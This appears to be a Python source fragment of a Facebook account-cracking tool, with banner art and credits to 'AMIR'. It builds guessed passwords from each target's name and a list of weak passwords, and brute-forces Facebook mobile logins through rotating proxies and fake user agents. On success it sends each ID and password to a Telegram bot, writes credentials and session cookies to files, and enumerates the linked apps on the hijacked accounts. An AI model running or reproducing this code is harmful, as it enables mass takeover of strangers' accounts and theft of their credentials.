            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣇⣀⣤⣤⣴⣶⣶⣶⠿⠿⠟⠛⠓⠒⠀⠀⠀⠀⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⣋⣩⣤⣤⣴⡶⠶⠶⠂⠀⠀⠀⠀⠀⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣶⣿⣿⣿⣿⣿⠿⢋⣩⣴⣾⡿⠟⣋⣭⣵⣶⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣶⢿⣻⣿⣿⣿⠟⠉⣠⣶⣿⠿⢋⣥⣶⣿⣿⣿⣿⣿⣿⣿⣿⣦⣄⣀⠀⠀⠀⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⢰⣾⣯⢁⣼⣿⣿⣿⢟⣴⣾⡿⠛⠡⠶⠿⠿⠿⢿⣿⣿⣿⣿⣿⣿⠿⠿⠿⠿⠿⠶⠶⠖⠀
            ⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣾⣿⣿⡟⣡⣿⣿⢟⣧⡀⠀⠀⠀⠀⠀⠀⠈⠉⠻⣿⣿⣿⣧⢱⣿⣿⣿⣦⡀⠀⠀
            ⠀⠀⠀⣴⣤⣴⣾⣿⣿⣿⣿⣿⣿⢏⣼⣿⣿⢋⣾⣿⣿⣷⣦⣄⣀⠀⠀⠀⠀⠀⠈⢿⣿⣿⡇⢻⣿⣿⣿⡿⠶⠤
            ⠀⣠⣾⣿⣿⣿⣿⡿⠟⠛⠉⠉⢋⣾⣿⣿⠋⠛⠛⠛⠋⠉⠉⠉⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣷⠈⣿⣿⣿⣧⠀⠀
            ⠘⢿⣿⣿⣿⡟⠁⠀⠀⠀⠀⠀⣼⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡧⠀⢹⣿⣿⣿⠀⠀
            ⠀⠀⠙⢿⣿⡇⠀⠀⢸⣦⡀⢸⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⠁⡀⢸⣿⣿⣿⠀⠀
            ⠀⠀⠀⠀⠈⠙⠀⠀⠈⢿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⡿⠃⣰⠃⣾⣿⣿⡟⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣿⣿⡿⢁⣼⡇⢠⣿⣿⣿⠃⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⢾⣿⡿⠋⠠⠾⠿⠀⠾⠿⠿⣟⠀⠀⠀
        \033[1;32m_   _   _   _     _   _   _   _   _   _
       / \ / \ / \ / \   / \ / \ / \ / \ / \ / \ \

     \x1b[38;5;208m ( A | M | I | R ) \033[1;97m( \x1b[1;32mE | \x1b[1;35mL | \x1b[1;96mS | \033[1;97mY | \x1b[1;91mR | \x1b[1;34mI )
      \033[1;32m \_/ \_/ \_/ \_/   \033[1;32m\_/ \_/ \_/ \_/ \_/ \_/

           \033[1;32m ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣿⣿⣿⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘
	''')
	global prog,des
	print(('\033[92m—'*60)+'\n         \33[0;41m[  امير السوري لديكم فلا خوف عليكم  ]     \033[0;92m\n'+('—'*60))
	print('''\033[1;37m[\033[1;32m=\033[1;37m]\033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-
\033[97;1m[\033[92;1m✓\033[97;1m] \033[1;97mFIRST \033[1;34m[\033[1;32mON\033[1;97m/\033[38;5;196mOFF\033[1;34m] \033[1;97mAIRPLANE MODE
\033[97;1m[\033[92;1m✓\033[97;1m] \033[1;97mMIX IDZ CLONING ENJOY DEAR USER\n\033[1;37m[\033[1;32m=\033[1;37m]\033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-''')
	urut = []
	
	wa.print(Columns(urut))
	prog = Progress(TextColumn('{task.description}'),BarColumn(),TextColumn('{task.percentage:.0f}%'))
	des = prog.add_task('',total=len(id2))
	with prog:
		with tred(max_workers=30) as pool:
			for yuzong in id2:
				idf,nmf = yuzong.split('|')[0],yuzong.split('|')[1].lower()
				frs = nmf.split(' ')[0]
				pwv = []
				if len(nmf)<6:
					if len(frs)<3:
						pass
					else:
						pwv.append(nmf)
						pwv.append(frs + frs)
						pwv.append(frs + ' ' + frs)
						pwv.append(frs + '123')
						pwv.append(frs + '1234')
						pwv.append(frs + '12345')
						pwv.append(frs + '123456')
						pwv.append('١٢٣٤٥٦')
						pwv.append('١٢٣٤٥٦٧٨٩')
						pwv.append('1122334455@@')
						pwv.append('aassddff')
						pwv.append('zzxxccvv')
						pwv.append('zzxxccvvbbnnmm')
						pwv.append('llkkjjhhggffddssaa')
						pwv.append('qqwweerr')
						pwv.append('mmmmnnnn')
						pwv.append('12345qwert')
						pwv.append('qwertyuiopasdfghjkl')
						pwv.append('mmnnbbvv')
						pwv.append('ppooiiuuyy')
						pwv.append('zzxxccvv')
						pwv.append('zxcvzxcv')
						pwv.append('qqwweerr')
						pwv.append('qwertyuiop')
						pwv.append('zxcvzxcv')
						pwv.append('qwertyuiopasdfghjkl')
						pwv.append('12345@12345')
						pwv.append('123@123')
						pwv.append('1234512345')
						pwv.append('123412345')
						pwv.append('1234554321')
						pwv.append('00998877')
						pwv.append('1122334455')
						pwv.append('1q2w3e4r5t')
						pwv.append('1q2w3e4r5t6y')
						pwv.append('1020304050')
						pwv.append('20222022')
						
				else:
					if len(frs)<3:
						pwv.append(nmf)
					else:
						pwv.append(nmf)
						pwv.append(frs + frs)
						pwv.append(frs + ' ' + frs)
						pwv.append(frs + '123')
						pwv.append(frs + '1234')
						pwv.append(frs + '12345')
						pwv.append(frs + '123456')
						pwv.append('١٢٣٤٥٦')
						pwv.append('١٢٣٤٥٦٧٨٩')
						pwv.append('1122334455@@')
						pwv.append('aassddff')
						pwv.append('zzxxccvv')
						pwv.append('zzxxccvvbbnnmm')
						pwv.append('llkkjjhhggffddssaa')
						pwv.append('qqwweerr')
						pwv.append('mmmmnnnn')
						pwv.append('12345qwert')
						pwv.append('qwertyuiopasdfghjkl')
						pwv.append('mmnnbbvv')
						pwv.append('ppooiiuuyy')
						pwv.append('zzxxccvv')
						pwv.append('zxcvzxcv')
						pwv.append('qqwweerr')
						pwv.append('qwertyuiop')
						pwv.append('zxcvzxcv')
						pwv.append('qwertyuiopasdfghjkl')
						pwv.append('12345@12345')
						pwv.append('123@123')
						pwv.append('1234512345')
						pwv.append('123412345')
						pwv.append('1234554321')
						pwv.append('00998877')
						pwv.append('1122334455')
						pwv.append('1q2w3e4r5t')
						pwv.append('1q2w3e4r5t6y')
						pwv.append('1020304050')
						pwv.append('20222022')
				if 'ya' in pwpluss: 
					for xpwd in pwnya:
						pwv.append(xpwd)
				else:pass
				if 'async' in method:
					pool.submit(crackasync,idf,pwv)
				else:
					pool.submit(crackasync,idf,pwv)
		print('')
	
	print(f'  {P}[{h}•{x}]{h} OK : {h}%s '%(ok))
	print(f'{x}  [{h}•{x}]{k} CP : {k}%s{x} '%(cp))

def _____AMIR_____(u):
        for e in u + "\n":sys.stdout.write(e);sys.stdout.flush();time.sleep(0.002)
def tahun(fx):
        if len(fx)==15:
                if fx[:10] in ['1000000000']       :tahunz = '2009'
                elif fx[:9] in ['100000000']       :tahunz = '2009'
                elif fx[:8] in ['10000000']        :tahunz = '2009'
                elif fx[:7] in ['1000000','1000001','1000002','1000003','1000004','1000005']:tahunz = '2009'
                elif fx[:7] in ['1000006','1000007','1000008','1000009']:tahunz = '2010'
                elif fx[:6] in ['100001']          :tahunz = '2010-2011'
                elif fx[:6] in ['100002','100003'] :tahunz = '2011-2012'
                elif fx[:6] in ['100004']          :tahunz = '2012-2013'
                elif fx[:6] in ['100005','100006'] :tahunz = '2013-2014'
                elif fx[:6] in ['100007','100008'] :tahunz = '2014-2015'
                elif fx[:6] in ['100009']          :tahunz = '2015'
                elif fx[:5] in ['10001']           :tahunz = '2015-2016'
                elif fx[:5] in ['10002']           :tahunz = '2016-2017'
                elif fx[:5] in ['10003']           :tahunz = '2018'
                elif fx[:5] in ['10004']           :tahunz = '2019'
                elif fx[:5] in ['10005']           :tahunz = '2020'
                elif fx[:5] in ['10006','10007','10008','10009','100010','100011','100012']:tahunz = '2021-2022'
                else:tahunz=''
        elif len(fx) in [9,10]:
                tahunz = '2008-2009'
        elif len(fx)==8:
                tahunz = '2007-2008'
        elif len(fx)==7:
                tahunz = '2006-2007'
        else:tahunz=''
        return tahunz		
#----------[ METODE-VALIDATE ]----------#	

def crackasync(idf,pwv):
	global loop,ok,cp
	bo = random.choice([m,k,h,b,u,x])
	ua = random.choice(ugen)
#	ua = random.choice(ugen2)
	ses = requests.Session()
	prog.update(des,description=f"{h}[ AMIR ]{x} {loop}/{len(id)} OK ✔ [bold green]{ok}[/] CP ✘ [bold yellow]{cp}[/]")
	prog.advance(des) 
	for pw in pwv:
		try:
			if 'ya' in ualuh: ua = ualu[0]
			nip=random.choice(prox)
			proxs= {'http': 'socks5://'+nip}
			link = ses.get('https://m.facebook.com/login.php?skip_api_login=1&api_key=290293790992170&kid_directed_site=0&app_id=290293790992170&signed_next=1&next=https%3A%2F%2Ffree.facebook.com%2Fv8.0%2Fdialog%2Foauth%3Fcct_prefetching%3D0%26client_id%3D290293790992170%26cbt%3D1684773097456%26e2e%3D%257B%2522init%2522%253A1684773097456%257D%26ies%3D0%26sdk%3Dandroid-android-8.2.0%26sso%3Dchrome_custom_tab%26scope%3Dpublic_profile%252Cemail%252Cuser_location%26state%3D%257B%257D%26default_audience%3Dfriends%26login_behavior%3DNATIVE_WITH_FALLBACK%26redirect_uri%3Dfb290293790992170%253A%252F%252Fauthorize%26auth_type%3Drerequest%26response_type%3Dtoken%252Csigned_request%252Cgraph_domain%26return_scopes%3Dtrue%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3Dad75f273-5e6b-4e07-b7dd-eab74845964f%26tp%3Dunspecified&cancel_url=fb290293790992170%3A%2F%2Fauthorize%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%257D%23_%3D_&display=touch&locale=id_ID&pl_dbl=0&refsrc=deprecated&_rdr')
			data = {
'lsd': re.search('name="lsd" value="(.*?)"',str(link.text)).group(1),
'jazoest': re.search('name="jazoest" value="(.*?)"',str(link.text)).group(1),
'm_ts': re.search('name="m_ts" value="(.*?)"',str(link.text)).group(1),
'li': re.search('name="li" value="(.*?)"',str(link.text)).group(1),
'try_number': 0,
'unrecognized_tries': 0,
'email':idf,
'pass':pw,
'login':'Masuk',
'prefill_contact_point': '',
'prefill_source': '',
'prefill_type': '',
'first_prefill_source': '',
'first_prefill_type': '',
'had_cp_prefilled': False,
'had_password_prefilled': False,
'is_smart_lock': False,
'bi_xrwh': 0
}
			headers = {'Host': 'm.facebook.com','x-fb-rlafr': '0','access-control-allow-origin': '*','facebook-api-version': 'v8.0','strict-transport-security': 'max-age=15552000; preload','pragma': 'no-cache','cache-control': 'private, no-cache, no-store, must-revalidate','x-fb-debug': 'RW01gY2TTCMqIdYqyuqmeF1CqLG/4X9gWARBaqVi0LMUgCHNzLdLS+5lvlLnRgplESoVeUHKj4pMGYJWZrDACA==','content-length': '0','cache-control': 'max-age=0','sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="98"','sec-ch-ua-mobile': '?0','sec-ch-ua-platform': '"Android"','save-data': 'on','upgrade-insecure-requests': '1','origin': 'https://free.facebook.com','content-type': 'application/x-www-form-urlencoded','user-agent': 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36','accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','sec-fetch-site': 'same-origin','sec-fetch-mode': 'cors','sec-fetch-user': '?1','sec-fetch-dest': 'empty','referer': 'https://free.facebook.com/login.php?skip_api_login=1&api_key=290293790992170&kid_directed_site=0&app_id=290293790992170&signed_next=1&next=https%3A%2F%2Ffree.facebook.com%2Fv8.0%2Fdialog%2Foauth%3Fcct_prefetching%3D0%26client_id%3D290293790992170%26cbt%3D1684773097456%26e2e%3D%257B%2522init%2522%253A1684773097456%257D%26ies%3D0%26sdk%3Dandroid-android-8.2.0%26sso%3Dchrome_custom_tab%26scope%3Dpublic_profile%252Cemail%252Cuser_location%26state%3D%257B%257D%26default_audience%3Dfriends%26login_behavior%3DNATIVE_WITH_FALLBACK%26redirect_uri%3Dfb290293790992170%253A%252F%252Fauthorize%26auth_type%3Drerequest%26response_type%3Dtoken%252Csigned_request%252Cgraph_domain%26return_scopes%3Dtrue%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3Dad75f273-5e6b-4e07-b7dd-eab74845964f%26tp%3Dunspecified&cancel_url=fb290293790992170%3A%2F%2Fauthorize%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%257D%23_%3D_&display=touch&locale=id_ID&pl_dbl=0&refsrc=deprecated&_rdr','accept-encoding': 'gzip, deflate','accept-language': 'id-ID,id;q=0.9,en-GB;q=0.8,en;q=0.7,en-US;q=0.6'}
			po = ses.post('https://m.facebook.com/login/device-based/regular/login/?api_key=290293790992170&auth_token=42daecc7930acde214740b8da04f49d4&skip_api_login=1&signed_next=1&next=https%3A%2F%2Ffree.facebook.com%2Fv8.0%2Fdialog%2Foauth%3Fcct_prefetching%3D0%26client_id%3D290293790992170%26cbt%3D1684773097456%26e2e%3D%257B%2522init%2522%253A1684773097456%257D%26ies%3D0%26sdk%3Dandroid-android-8.2.0%26sso%3Dchrome_custom_tab%26scope%3Dpublic_profile%252Cemail%252Cuser_location%26state%3D%257B%257D%26default_audience%3Dfriends%26login_behavior%3DNATIVE_WITH_FALLBACK%26redirect_uri%3Dfb290293790992170%253A%252F%252Fauthorize%26auth_type%3Drerequest%26response_type%3Dtoken%252Csigned_request%252Cgraph_domain%26return_scopes%3Dtrue%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3Dad75f273-5e6b-4e07-b7dd-eab74845964f%26tp%3Dunspecified&refsrc=deprecated&app_id=290293790992170&cancel=fb290293790992170%3A%2F%2Fauthorize%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%257D%23_%3D_&lwv=100&locale2=id_ID&refid=9',data=data,headers=headers,allow_redirects=False)
			if "checkpoint" in po.cookies.get_dict().keys():
				cp+=1
				statuscp = f'''- ❲ CP امير السوري جبلك حساب سيكور ❳\n┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉\n\n  ⁂ - ID ➛ {idf}\n\n\n  ⁂ - PASS ➛ {pw}\n\n┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉\n  ⁂ - URL ➛ https://www.facebook.com/profile.php?id={idf}&mibextid=ZbWKwL\n\n┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉\n- BY ◆ ➛ @A_6_60 ~ @A_8_A_0\n\t\t\t\t\t
'''
				statuscp1 = nel(statuscp, width=90, style='bold yellow', title='')
				cetak(statuscp1)
				requests.get("https://api.telegram.org/bot"+str(token)+"/sendMessage?chat_id="+str(ID)+"&text="+str(statuscp))
					
				open('CP/'+cpc,'a').write(idf+'|'+pw+'\n')
				akun.append(idf+'|'+pw)
				break
			elif "c_user" in ses.cookies.get_dict().keys():
				ok+=1
				coki=po.cookies.get_dict()
				kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
				print('\n')
				
				statusok = f'''- ❲ OK امير السوري جبلك حساب شغال ❳\n┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉\n\n  ⁂ - ID ➛ {idf}\n\n\n  ⁂ - PASS ➛ {pw}\n\n┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉\n  ⁂ - URL ➛ https://www.facebook.com/profile.php?id={idf}&mibextid=ZbWKwL\n\n┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉\n- BY◆ ➛ @A_6_60 ~ @A_8_A_0\n\t\t\t\t\t
'''
					
				statusok1 = nel(statusok, width=90, style='bold purple', title='OK')
				cetak(statusok1)
				requests.get("https://api.telegram.org/bot"+str(token)+"/sendMessage?chat_id="+str(ID)+"&text="+str(statusok))
				
					
				open('OK/'+okc,'a').write(idf+'|'+pw+'|'+ua+'\n')
				cek_apk(kuki)
				break
				
			else:
				continue
		except requests.exceptions.ConnectionError:
			time.sleep(31)
	loop+=1
	
	#----------[ METODE-REGULER ]----------#	
def crackreguler(idf,pwx,url):
	global loop,ok,cp
	ses = requests.Session()
	rr = random.randint
	rc = random.choice
	emot = rc(["😝","😜","🤪"])
	prog.update(des,description=f"\r {emot} ( DAFA-XD ) (%s OK : {ok} %s) (%s CP : {cp} %s) (%s {loop} %s) "%(hijo,puti,kun,puti,hijo,puti))
	prog.advance(des)
	for pw in pwx:
		try:
			proxs = requests.get('https://raw.githubusercontent.com/TheSpeedX/SOCKS-List/master/socks4.txt').text
			open('socks4.txt','w').write(proxs)
			nip = rc(proxs)
			proxs = {'http': 'socks5://'+nip}
			ua = rc(ugen)
			ua2 = rc(["Mozilla/5.0 (iPhone; CPU iPhone OS 7_9_2 like Mac OS X; bhb-IN) like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Browser/NetFront/37.72 Version/12.0 Mobile/21B77 Safari/6535.50.4"]) 		
			ses.headers.update(
			{
			"Host":url,
			"upgrade-insecure-requests":"1",
			"user-agent":ua,
			"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9",
			"dnt":f"{str(rr(1,9))}",
			"x-requested-with":"mark.via.gp",
			"sec-fetch-site":"same-origin",
			"sec-fetch-mode":"cors",
			"sec-fetch-user":"empty",
			"sec-fetch-dest":"document",
			"referer":f"https://{url}/",
			"accept-encoding":"gzip, deflate br",
			"accept-language":"en-US;q=0.8,en;q=0.7"
			}
		)
			link = ses.get('https://m.facebook.com/login/?email='+idf).text
			date = ({'lsd':re.search('name="lsd" value="(.*?)"', str(link)).group(1),'jazoest':re.search('name="jazoest" value="(.*?)"', str(link)).group(1),'m_ts':re.search('name="m_ts" value="(.*?)"', str(link)).group(1),
'li':re.search('name="li" value="(.*?)"', str(link)).group(1),'email':idf,'pass':pw})
			ses.headers.update(
			{
			'Host': url,
			'cache-control': 'max-age=0',
			'upgrade-insecure-requests': '1',
			'origin': 'https://'+url,
			'content-type': 'application/x-www-form-urlencoded',
			'user-agent': ua,
			'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9',
			'sec-fetch-site': 'same-origin',
			'sec-fetch-mode': 'cors',
			'sec-fetch-user': 'empty',
			'sec-fetch-dest': 'document',
			'referer': f'https://{url}/login/?email='+idf,
			'accept-encoding':'gzip, deflate br',
			'accept-language': 'en-US;q=0.8,en;q=0.7'
			}
		)
			po = ses.post(f"https://{url}/login/login/device-based/regular/login/?shbl=1&refsrc=deprecated", data=date,allow_redirects=False,proxies=proxs)
			if "c_user" in ses.cookies.get_dict().keys():
				ok+=1
				coki = ses.cookies.get_dict()
				kuki = "datr=" + coki["datr"] + ";" + ("sb=" + coki["sb"]) + ";" + "locale=id_ID" + ";" + ("c_user=" + coki["c_user"]) + ";" + ("xs=" + coki["xs"]) + ";" + ("fr=" + coki["fr"]) + ";"
				print(f"\n⌲ User ID: {hijo}{idf}{puti}")
				print(f"⌲ Password: {hijo}{pw}{puti}")
				print(f"⌲ Tahun: {mer}{tahun(idf)}{puti}")
				print(f"⌲ Cookie: {hijo}{kuki}{puti}")
				print(f'{hijo}{ua}')
				open('CYXIEON-OK/'+'CYXIEON-OK.txt','a').write(idf+'|'+pw+'|'+'\n')
				open('CYXIEON-OK/'+'CYXIEON-WhithCookies.txt','a').write(idf+'|'+pw+'|'+kuki+'|''\n')
				cek_apk(kuki)
				break			
			elif "checkpoint" in po.cookies.get_dict().keys():
				print(f"\n⌲ User ID: {kun}{idf}{puti}")
				print(f"⌲ Password: {kun}{pw}{puti}")
				print(f"⌲ Tahun: {mer}{tahun(idf)}{puti}")
				print(f'{kun}{ua}')
				open('CYXIEON-CP/'+'CYXIEON-CP.txt','a').write(idf+'|'+pw+'|'+'\n')
				akune.append(idf+'|'+pw)
				ceker(idf,pw)
				cp+=1
				break	
				
			else:
				continue
		except requests.exceptions.ConnectionError:
			time.sleep(31)
	loop+=1

#----------[ CEK-OPSI ]----------#	
def ceker(idf,pw):
	global cp
	rc = random.choice
	url = rc(["free.facebook.com"])
	head = {"Host": url,
	"cache-control": "max-age=0",
	"upgrade-insecure-requests": "1",
	"origin": "https://"+url,
	"content-type": "application/x-www-form-urlencoded",
	"user-agent": "Mozilla/5.0 (Linux; Android 10; DOOGEE B10 Build/KOTG49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Mobile Safari/537.36",
	"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
	"x-requested-with": "com.android.chrome",
	"sec-fetch-site": "same-origin",
	"sec-fetch-mode": "navigate",
	"sec-fetch-user": "?1",
	"sec-fetch-dest": "document",
	"referer": f"https://{url}/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F",
	"accept-encoding": "gzip, deflate",
	"accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"}
	ses = requests.Session()
	try:
		hi = ses.get('https://'+url)
		kontol = sop(ses.post(
		'https://'+url+'/login.php',
		data={
		'email':idf,
	'pass':pw,
'login':'submit'
		},headers=head, allow_redirects=True).text,'html.parser')
		jo = kontol.find(
		'form'
		)
		data = {}
		lion = [
		'nh',
	'jazoest',
'fb_dtsg',
	'submit[Continue]',
		'checkpoint_data'
		]
		for anj in jo('input'):
			if anj.get('name') in lion:
				data.update({anj.get('name'):anj.get('value')})
		kent = sop(ses.post('https://'+url+str(jo['action']), data=data, headers=head).text,'html.parser')
		opsi = kent.find_all('option')
		if len(opsi)==0:
			tree = Tree("")
			tree.add(f"{hijo}Tapyes / A2f ( cek di mbasic ){puti}")
			prints(tree)
			#open('CYXIEON-CP/'+'CYXIEON-CP.txt','a').write(idf+'|'+pw+'|'+'\n')
			#cp+=1
		else:
			for opsii in opsi:
				print('\r%s---> %s%s'%(kk,opsii.text,x))
	except Exception as c:
		tree = Tree("")
		tree.add(f"{hijo}{idf}{puti}").add(f"{hijo}{pw}{puti}")
		tree.add(f"{mer}spam ip tidak dapat cek ops{puti}i")
		prints(tree)
		#open('CYXIEON-CP/'+'CYXIEON-CP.txt','a').write(idf+'|'+pw+'|'+'\n')
		#cp+=1
#-----------------------[ CEK APLIKASI ]--------------------#
def cek_apk(kuki):
	session = requests.Session()
	w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=active",cookies={"cookie":"noscript=1;"+kuki}).text
	sop = bs4.BeautifulSoup(w,"html.parser")
	x = sop.find("form",method="post")
	game = [i.text for i in x.find_all("h3")]
	try:
		for i in range(len(game)):
			print ("\r%s  \033[0m➛ %s%s"%(P,H,game[i].replace("Ditambahkan pada"," Ditambahkan pada")))
	except AttributeError:
		print ("\r    %s\033[0m cookie invalid"%(M))
	w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=inactive",cookies={"cookie":"noscript=1;"+kuki}).text
	sop = bs4.BeautifulSoup(w,"html.parser")
	x = sop.find("form",method="post")
	game = [i.text for i in x.find_all("h3")]
	try:
		for i in range(len(game)):
			print ("\r%s  \033[0m➛ %s"%(P,game[i].replace("Kedaluwarsa"," Kedaluwarsa")))
	except AttributeError:
		print ("\r    %s \033[0mcookie invalid"%(M))

def ceker(idf,pw):
	sess=requests.Session()
	data={}
	uua="Mozilla/5.0 (Linux; Android 11; CPH2493 Build/RKQ1.201217.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/82.0.1531.64 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/411.0.0.13.36;]","Mozilla/5.0 (Linux; Android 10; SM-A700S Build/OPR6.142770.293; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/94.0.2114.112 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/348.0.0.12.57;]","Mozilla/5.0 (Linux; Android 9; Oneplus A99831 Build/OPR6.142770.293; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.1518.41 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/343.0.0.03.54;]","Mozilla/5.0 (Linux; Android 11; Black Shark 4S Build/SP2A.653342.342; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/95.0.2318.41 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/136.0.0.14.72;]","Mozilla/5.0 (Linux; Android 9; 22041219I Build/TP1A.904992.769; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.1431.179 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/156.0.0.23.66;]","Mozilla/5.0 (Linux; Android 11; CPH2493 Build/RKQ1.201217.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/93.0.1734.2 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/321.0.0.02.33;]","Mozilla/5.0 (Linux; Android 11; SM-A700K Build/SD2A.276412.601; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/95.0.1576.83 Mobile Safari/537.36 